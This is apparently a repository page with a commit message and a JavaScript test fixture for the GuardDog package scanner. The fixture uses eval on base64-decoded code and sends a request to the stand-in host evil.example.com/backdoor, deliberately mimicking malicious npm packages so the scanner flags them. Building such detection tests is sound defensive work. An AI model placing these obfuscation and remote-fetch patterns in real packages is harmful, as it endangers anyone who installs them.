11ce9802e9
- examples/evil-pypi/: exec-base64, shady-links, code-execution, dll-hijacking - examples/evil-npm/: eval, Buffer(base64), shady-links - examples/evil-go/: exec+base64, shady-links - examples/trigger-scans.sh: сборка архивов + Docker cp + вебхуки + проверка - README.md + README.en.md: секция E2E-тестирования с curl-примерами - E2E пройден: pypi(2 findings), npm(1), go(1) — все flagged
14 lines
390 B
JavaScript
14 lines
390 B
JavaScript
// GuardDog will flag: npm-api-obfuscation, npm-exec-base64, shady-links
|
|
|
|
// eval usage
|
|
eval("console.log('executed')");
|
|
|
|
// base64-encoded code execution
|
|
const encoded = "Y29uc29sZS5sb2coJ2JhZCBjb2RlJyk=";
|
|
eval(Buffer.from(encoded, "base64").toString());
|
|
|
|
// shady-links: suspicious downloads
|
|
const url = "http://evil.example.com/backdoor";
|
|
const https = require("https");
|
|
https.get(url);
|